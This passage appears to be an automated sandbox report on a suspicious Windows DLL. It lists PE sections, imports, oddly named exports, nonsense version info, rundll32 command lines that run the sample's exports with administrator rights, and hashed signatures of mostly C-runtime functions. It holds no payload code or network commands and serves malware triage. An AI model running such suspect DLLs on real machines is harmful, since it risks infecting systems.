| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x70d60 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x5e000 | 0x1b4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x5c9e8 | 0x5ca00 | False | 0.615445238698 | data | 6.76388282152 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0x5e000 | 0x150ea | 0x15200 | False | 0.523761094675 | data | 5.71930655491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x74000 | 0x15d14 | 0xe00 | False | 0.208426339286 | DOS executable (COM, 0x8C-variant) | 2.91984916435 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x8a000 | 0x4a8 | 0x600 | False | 0.367838541667 | data | 3.03803804684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x8b000 | 0x2984 | 0x2a00 | False | 0.793712797619 | data | 6.70935013464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_VERSION | 0x8a0a0 | 0x36c | data | English | United States |
| RT_MANIFEST | 0x8a410 | 0x91 | XML 1.0 document text | English | United States |

Imports

| DLL | Import |
|---|---|
| KERNEL32.dll | WriteConsoleW, FindFirstChangeNotificationW, GetEnvironmentVariableW, LoadLibraryW, CreateEventW, FileTimeToLocalFileTime, DeviceIoControl, WaitForSingleObject, VirtualProtectEx, VirtualProtect, GetVersion, CloseHandle, CreateFileW, OutputDebugStringW, ReadConsoleW, ReadFile, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetCurrentThread, HeapAlloc, GetCPInfo, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetProcessHeap, GetStdHandle, GetFileType, SetConsoleCtrlHandler, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, DecodePointer |
| CRYPT32.dll | CryptDecodeObject, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CertGetCertificateChain, CryptAcquireCertificatePrivateKey, CryptImportPublicKeyInfo, CertDeleteCertificateFromStore, CertAddCertificateContextToStore, CertFreeCertificateContext, CertCreateCertificateContext, CertCloseStore, CryptEncodeObject |
| Secur32.dll | ImpersonateSecurityContext, InitializeSecurityContextW, DeleteSecurityContext, FreeContextBuffer |

Exports

| Name | Ordinal | Address |
|---|---|---|
| Dark@@4 | 1 | 0x1029882 |
| Schoolpress@@8 | 2 | 0x1029898 |
| Triangleart@@8 | 3 | 0x10299a8 |

Version Infos

| Description | Data |
|---|---|
| LegalCopyright | Settle equal Corporation. All rights reserved |
| InternalName | Property Womentogether |
| FileVersion | 6.6.8.172 |
| CompanyName | Settle equal Corporation |
| Money | 90 |
| ProductName | Settle equal Rope lie |
| ProductVersion | 6.6.8.172 |
| FileDescription | Settle equal Rope lie |
| OriginalFilename | Cell.dll |
| Translation | 0x0409 0x04b0 |

Possible Origin

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

Network Behavior

No network behavior found

Code Manipulations

System Behavior

General

Start time:17:13:16
Start date:12/05/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll'
Imagebase:0xcf0000
File size:116736 bytes
MD5 hash:542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:17:13:16
Start date:12/05/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:17:13:16
Start date:12/05/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Dark@@4
Imagebase:0x1170000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:17:13:16
Start date:12/05/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1
Imagebase:0x1170000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:17:13:20
Start date:12/05/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Schoolpress@@8
Imagebase:0x1170000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:17:13:23
Start date:12/05/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Triangleart@@8
Imagebase:0x1170000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis

    Executed Functions

    APIs
    • __RTC_Initialize.LIBCMT ref: 6D52A8EF
    • ___scrt_uninitialize_crt.LIBCMT ref: 6D52A909
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp
    Similarity
    • API ID: Initialize___scrt_uninitialize_crt
    • String ID:
    • API String ID: 2442719207-0
    • Opcode ID: 78d8ae7c352570639f0f2a5c82d7c434c5200dc43c28f48242bbbbaf102869fc
    • Instruction ID: 595d8f42a4247939171a340a72e1e44b72c2530bb220d5dd408d084d3e39fd0b
    • Opcode Fuzzy Hash: 78d8ae7c352570639f0f2a5c82d7c434c5200dc43c28f48242bbbbaf102869fc
    • Instruction Fuzzy Hash: D2410332D08226AFDB298F65CC40FAE7A75EFC1B65F024419E92557AC0C7304D098FA0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction ID: 320ebb8cc9b7f9ae688d4b65ec6c1f1d1e2a28de22e9a359cfa2196ae796c12e
    • Opcode Fuzzy Hash: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction Fuzzy Hash: 44219172D0461AAFCB298E25CD40E7F3A79EFC4BA4F024515F82557A90C7308D498FE0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __RTC_Initialize.LIBCMT ref: 6D52A7EE
      • Part of subcall function 6D52B40D: InitializeSListHead.KERNEL32(6D588DD0,6D52A7F8,6D571D60,00000010,6D52A789,?,?,?,6D52A9B1,?,00000001,?,?,00000001,?,6D571DA8), ref: 6D52B412
    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D52A858
    • ___scrt_fastfail.LIBCMT ref: 6D52A8A2
    Similarity
    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
    • String ID:
    • API String ID: 2097537958-0
    • Opcode ID: 0aa489b78d39a88b3577829db704d799b14d996c9964aa8f70a6ed2a60e6617b
    • Instruction ID: 9c8ae21e878c3c0282fbb5e741d260dd475e9d98cd92f08348496be605965202
    • Opcode Fuzzy Hash: 0aa489b78d39a88b3577829db704d799b14d996c9964aa8f70a6ed2a60e6617b
    • Instruction Fuzzy Hash: 2721273254C2129EDF1D7BB49804FAC3B729F8226DF124816D680B7DC2DB32484EC6A6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 6D547E37
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D547EA5
      • Part of subcall function 6D547D21: WideCharToMultiByte.KERNEL32(?,00000000,6D54A405,00000000,00000001,6D54A1AC,6D551463,?,6D54A405,?,00000000,?,6D5511C1,0000FDE9,00000000,?), ref: 6D547DC3
      • Part of subcall function 6D543817: RtlAllocateHeap.NTDLL(00000000,?,?,?,6D5298A7,000008C8), ref: 6D543849
    • _free.LIBCMT ref: 6D547E96
    Similarity
    • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
    • String ID:
    • API String ID: 2560199156-0
    • Opcode ID: 36ffac122e7cc15a2c712a9d455d7d2afd754acf446a64f8baf1166f7d2ef928
    • Instruction ID: 604745672baac06a8786eaa324d27bfd8d21effb9be8fb8d002f97d0819bcfcc
    • Opcode Fuzzy Hash: 36ffac122e7cc15a2c712a9d455d7d2afd754acf446a64f8baf1166f7d2ef928
    • Instruction Fuzzy Hash: 5701FCB3D156163B6B1A01B64C88C7B2A6ECDC6B943118628FA14D2500FF50CD0181F2
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D545D30: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D54375B,00000001,00000364,00000007,000000FF,?,?,?,6D5438E3,6D54385A), ref: 6D545D71
    • _free.LIBCMT ref: 6D5503EC
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: 2c42c5002e163c3ee7b5e6a90864c2509c68fed5d330ce80ee1f83e26ec47326
    • Instruction ID: c8bbc1e966fbac0da53536dc9ed95ebd30271cd62d37d50f3c885a2f62d0442c
    • Opcode Fuzzy Hash: 2c42c5002e163c3ee7b5e6a90864c2509c68fed5d330ce80ee1f83e26ec47326
    • Instruction Fuzzy Hash: F60189726083126BC326CF5DC88099EFB98EB443B4F020A2EE551A3AC0D3706D10CBE0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D54375B,00000001,00000364,00000007,000000FF,?,?,?,6D5438E3,6D54385A), ref: 6D545D71
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 116f7a87ed38b69585d8ed5c3f438d8a4d9ea566ab4ed7a1ba8855f336c5b591
    • Instruction ID: e9374abefb1ccb153a20242b3a8ebceb6198635ec6c7f30bf1487769857007c1
    • Opcode Fuzzy Hash: 116f7a87ed38b69585d8ed5c3f438d8a4d9ea566ab4ed7a1ba8855f336c5b591
    • Instruction Fuzzy Hash: 1BF0E93164457567EF1E5A76CC0CB7B3798AF82770B12C922E814DBC94DB20EA0586E3
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,6D5298A7,000008C8), ref: 6D543849
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 8e3807fc032ebccb02d7d3b4332d34bdb57a3df986fde2a11bf87cf6679b0cc9
    • Instruction ID: 162616de51d10bf397ea5111f40005fe0da24cb644c8ad94b93cb7b65b522875
    • Opcode Fuzzy Hash: 8e3807fc032ebccb02d7d3b4332d34bdb57a3df986fde2a11bf87cf6679b0cc9
    • Instruction Fuzzy Hash: A9E09B355C72229BFB5A16EA8C04B67F75CAF827A1F12C934ED1597CB4EB60D80046E3
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    APIs
    Strings
    Similarity
    • API ID: Name::operator+$operator+
    • String ID: /
    • API String ID: 1595903985-2043925204
    • Opcode ID: 894a396952c350a246be41e58c1b3438e3a312075efdbc1b58d5214ecb27f2c2
    • Instruction ID: c36158d3e7f96a8b5e44fbc6d42ab311e494395fec2dda646c76e84afb0cc79b
    • Opcode Fuzzy Hash: 894a396952c350a246be41e58c1b3438e3a312075efdbc1b58d5214ecb27f2c2
    • Instruction Fuzzy Hash: 16824272D1472A9BDF0DCFA9C890BEEB7B4BB44344F12452AE515E7A80FB349A44CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • GetACP.KERNEL32(?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6D54EAE6
    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?), ref: 6D54EB11
    • _wcschr.LIBVCRUNTIME ref: 6D54EBA5
    • _wcschr.LIBVCRUNTIME ref: 6D54EBB3
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D54EC74
    Strings
    Similarity
    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
    • String ID: utf8
    • API String ID: 4147378913-905460609
    • Opcode ID: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction ID: d78fea38672865cb5b77d662cfdd72af5e1de1b1ab1a210d5fb313ed846aef42
    • Opcode Fuzzy Hash: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction Fuzzy Hash: BB713B71644203AAE71EDB75CD49FB773A8FF85304F11C86AEA05D7980EB70E94187A2
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLocaleInfoW.KERNEL32(?,2000000B,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F268
    • GetLocaleInfoW.KERNEL32(?,20001004,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F291
    • GetACP.KERNEL32(?,?,6D54F4ED,?,00000000), ref: 6D54F2A6
    Strings
    Similarity
    • API ID: InfoLocale
    • String ID: ACP$OCP
    • API String ID: 2299586839-711371036
    • Opcode ID: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction ID: ac97e00777d40908981faea32fca04b60d1a0b2c34faa57eaf7e2482a40eb842
    • Opcode Fuzzy Hash: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction Fuzzy Hash: E521A43AA4C102A6E75DCF5CCE01A9B73B6BB85B54B52CD24E905C7900E732DD40C762
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D54361B
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D543651
    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6D54F4B0
    • IsValidCodePage.KERNEL32(00000000), ref: 6D54F4F9
    • IsValidLocale.KERNEL32(?,00000001), ref: 6D54F508
    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6D54F550
    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6D54F56F
    Similarity
    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
    • String ID:
    • API String ID: 949163717-0
    • Opcode ID: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction ID: 10b3acbe3ac6cbad06cc1ab24985ce8530a03155b276faebcad073cae3c52fba
    • Opcode Fuzzy Hash: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction Fuzzy Hash: 7A515671A00206AFEF09DFA8CC44BBF77B8FF45704F158869E614E7590EB7099448B62
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D54361B
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D543651
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D54EEAA
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D54EEF4
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D54EFBA
    Similarity
    • API ID: InfoLocale$ErrorLast_free
    • String ID:
    • API String ID: 3140898709-0
    • Opcode ID: e7cb463a65565a5929bd6877efbeab7dc706c671a5b42aaf9e522aa4976f3da2
    • Instruction ID: 0cc055dffd1249d8df7f3b42a93f58f8317eaadc597d79e04f37077076ad2b62
    • Opcode Fuzzy Hash: e7cb463a65565a5929bd6877efbeab7dc706c671a5b42aaf9e522aa4976f3da2
    • Instruction Fuzzy Hash: 86618071554217ABEB1DCF28CC81BBAB7B8FF44305F10857AE91AC6984EB34D981CB52
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 6D54680E
    • FindNextFileW.KERNEL32(00000000,?), ref: 6D54688C
    • FindClose.KERNEL32(00000000), ref: 6D5468CE
    Similarity
    • API ID: Find$File$CloseFirstNext
    • String ID:
    • API String ID: 3541575487-0
    • Opcode ID: 53416b817e9290a1aa98f03c0a2cc651cd75d0103bac42490053baa040121868
    • Instruction ID: 034db084aedc4ae4b86a9c856dbbc7c793671274f391eab28b549f9d298d9f80
    • Opcode Fuzzy Hash: 53416b817e9290a1aa98f03c0a2cc651cd75d0103bac42490053baa040121868
    • Instruction Fuzzy Hash: 8841A471904315ABDB28DE69CC88FFAB7B9EBC5314F01C599E505D7580EA309E84CAA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,6D52A161), ref: 6D536AAC
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6D52A161), ref: 6D536AB6
    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,6D52A161), ref: 6D536AC3
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: 1eb67e57d6d192639991a3bbe1ebb6fe96fd8d4f6f7b41c13797e12fe1dfd6e3
    • Instruction ID: 64000505052173bb164dde99755aab7b5b4f57027a00b979e3222878f1147502
    • Opcode Fuzzy Hash: 1eb67e57d6d192639991a3bbe1ebb6fe96fd8d4f6f7b41c13797e12fe1dfd6e3
    • Instruction Fuzzy Hash: 0831D2749013299BCF25DF24D888B8DBBB8BF08310F5145EAE51CA7290EB309F858F44
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetCurrentProcess.KERNEL32(?,?,6D537380,?,00000001,?,?), ref: 6D5373A3
    • TerminateProcess.KERNEL32(00000000,?,6D537380,?,00000001,?,?), ref: 6D5373AA
    • ExitProcess.KERNEL32 ref: 6D5373BC
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Similarity
    • API ID: __floor_pentium4
    • String ID:
    • API String ID: 4168288129-0
    Uniqueness

    Uniqueness Score: -1.00%

    Similarity
    • API ID:
    • String ID:
    • API String ID:
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D52AAD5
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D54361B
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D543651
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D54F0FD
    Similarity
    • API ID: ErrorLast_free$InfoLocale
    • String ID:
    • API String ID: 2003897158-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • EnumSystemLocalesW.KERNEL32(6D54EE56,00000001,00000000,?,-00000050,?,6D54F484,00000000,?,?,?,00000055,?), ref: 6D54EDA2
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6D54F072,00000000,00000000,?), ref: 6D54F301
    Similarity
    • API ID: ErrorLast$InfoLocale
    • String ID:
    • API String ID: 3736152602-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • EnumSystemLocalesW.KERNEL32(6D54F0A9,00000001,00000000,?,-00000050,?,6D54F448,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6D54EE15
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D545A0F: EnterCriticalSection.KERNEL32(?,?,6D536ED2,00000000,6D571F50,0000000C,6D536E99,?,?,6D545D63,?,?,6D54375B,00000001,00000364,00000007), ref: 6D545A1E
    • EnumSystemLocalesW.KERNEL32(6D548733,00000001,6D572278,0000000C,6D548FD4,00000000), ref: 6D548778
    Similarity
    • API ID: CriticalEnterEnumLocalesSectionSystem
    • String ID:
    • API String ID: 1272433827-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • EnumSystemLocalesW.KERNEL32(6D54EC20,00000001,00000000,?,?,6D54F4A6,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6D54ECFE
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6D54553A,?,20001004,00000000,00000002,?,?,6D54489B), ref: 6D549197
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • EnumSystemLocalesW.KERNEL32(Function_00048733,00000001), ref: 6D54885A
    Similarity
    • API ID: EnumLocalesSystem
    • String ID:
    • API String ID: 2099609381-0
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: 0
    • API String ID: 0-4108050209
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: 0
    • API String ID: 0-4108050209
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: 0
    • API String ID: 0-4108050209
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: 0
    • API String ID: 0-4108050209
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: 0
    • API String ID: 0-4108050209
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: 0
    • API String ID: 0-4108050209
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: 0
    • API String ID: 0-4108050209
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: 0
    • API String ID: 0-4108050209
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: GetSystemTimePreciseAsFileTime
    • API String ID: 0-595813830
    Uniqueness

    Uniqueness Score: -1.00%

    Similarity
    • API ID:
    • String ID:
    • API String ID:
    Uniqueness

    Uniqueness Score: -1.00%

    Similarity
    • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
    • String ID:
    • API String ID: 4283097504-0
    Uniqueness

    Uniqueness Score: -1.00%

    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 163c3d9e0ded9eafb69a88deaa52aef34a73af8a6913d69e5037214107004f37
    • Instruction ID: 9a1e07b23ad85842d8653e294953db2562494688737913d18ac9978009ccfef7
